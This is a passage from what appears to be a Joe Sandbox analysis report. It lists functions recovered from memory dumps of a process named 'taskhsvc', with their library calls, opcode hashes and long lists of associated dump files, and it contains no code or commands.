Part of subcall function 00F12356: abort.MSVCRT ref: 00F123A6
Part of subcall function 00F12356: SSL_pending.SSLEAY32 ref: 00F123B4
Part of subcall function 00F12356: __stack_chk_fail.LIBSSP-0 ref: 00F123C4

Part of subcall function 00DB3DED: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00D91825), ref: 00DB3E14

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$L_pendingabort
String ID:
API String ID: 1266101828-0
Opcode ID: 3f5d328d302451bfd70fbb7a668d15013b330277f8c00439b840c7ebed201033
Instruction ID: 17a48a5f185ea2f334182a3fdb416854cc3f3d135b0ec27c0d15138fe41b5520
Opcode Fuzzy Hash: 3f5d328d302451bfd70fbb7a668d15013b330277f8c00439b840c7ebed201033
Instruction Fuzzy Hash: 2D22C478E04259DFCB04DFA9C484AADBBF1AF49310F19845AE8A5EB352D734D842DF21

Uniqueness

Uniqueness Score: -1.00%

Function 00FC6BB0 Relevance: 3.2, APIs: 2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 578c4804fb9b186fcca99ab0d8f09f4d3972da0eefba433a1eb44fc53ffde1f5
Instruction ID: bcd75bfd2b4a9320e826ce1efdc647d5145ff5a4cc104674f9bc6101c4c59508
Opcode Fuzzy Hash: 578c4804fb9b186fcca99ab0d8f09f4d3972da0eefba433a1eb44fc53ffde1f5
Instruction Fuzzy Hash: 97617B71A092128FCB54DF68DA81B5D7BF1FB48310F18851EE8C9E7319D739A804EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E8314C Relevance: 3.2, APIs: 2, Instructions: 177COMMON

Download Yara Rule

APIs

Part of subcall function 00DEF792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00DD6074), ref: 00DEF7B2

Part of subcall function 00E84037: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00E3B8B5), ref: 00E8408C

Part of subcall function 00E84093: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00E3B89E), ref: 00E840C7

Part of subcall function 00E83B52: __stack_chk_fail.LIBSSP-0 ref: 00E83C6E

__stack_chk_fail.LIBSSP-0 ref: 00E833E1

Memory Dump Source

Source File: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail
String ID:
API String ID: 4216919130-0
Opcode ID: 9ee3aeff8aa98efd0d77766003e59b25e82f191dfceed63c44af72af98054bef
Instruction ID: a8ccc3fd716b712450c4f50b47f625a82f8d2cd719eb9df7cdbf00905a7cef73
Opcode Fuzzy Hash: 9ee3aeff8aa98efd0d77766003e59b25e82f191dfceed63c44af72af98054bef
Instruction Fuzzy Hash: 7271A1B49092099FDB00EFB9C1856ADBBF0AF48704F10A869E8ACF7251D734AA45DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00DE7DBA Relevance: 3.2, APIs: 2, Instructions: 176COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00DE7E7F

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

__stack_chk_fail.LIBSSP-0 ref: 00DE8076

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abort
String ID:
API String ID: 646538096-0
Opcode ID: 94738bf4c90d635bbfd0301e4f648957ea78928ae415c9d2c73e67b2eb028f7f
Instruction ID: 00a6a23b41d3417953259fc1af15aaf83108bf9a82c9127d5e7102a2fe1184a8
Opcode Fuzzy Hash: 94738bf4c90d635bbfd0301e4f648957ea78928ae415c9d2c73e67b2eb028f7f
Instruction Fuzzy Hash: 8781E7B490435ACFCB40EFAAC5447AEBBF0BF04304F158859E498AB351D778D944DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00E31DC5 Relevance: 3.1, APIs: 2, Instructions: 140COMMON

Download Yara Rule

APIs

Part of subcall function 00DEF792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00DD6074), ref: 00DEF7B2

Part of subcall function 00E31A83: __stack_chk_fail.LIBSSP-0 ref: 00E31ABC

__stack_chk_fail.LIBSSP-0 ref: 00E31FBD

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

abort.MSVCRT ref: 00E31E5F

Part of subcall function 00ED81DD: __stack_chk_fail.LIBSSP-0 ref: 00ED826A

Part of subcall function 00E303CA: __stack_chk_fail.LIBSSP-0 ref: 00E303FE

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Memory Dump Source

Source File: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
